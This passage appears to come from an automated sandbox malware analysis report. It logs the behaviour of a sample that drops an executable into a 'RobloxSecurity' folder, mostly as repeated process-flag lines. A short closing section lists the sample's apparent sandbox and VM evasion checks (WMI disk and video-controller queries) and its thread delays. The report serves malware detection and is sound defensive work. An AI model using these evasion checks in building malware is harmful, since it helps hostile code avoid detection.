                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2D20000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeMemory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeMemory allocated: 1F996210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeMemory allocated: 1F9AFDF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1B8A9DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1B8C3950000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 10DD58D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 10DEF3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 17A71580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 17A73090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1EC01810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1EC199B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 167CFD40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 167E9760000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1CF0AE90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMemory allocated: 1CF24830000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeThread delayed: delay time: 599766
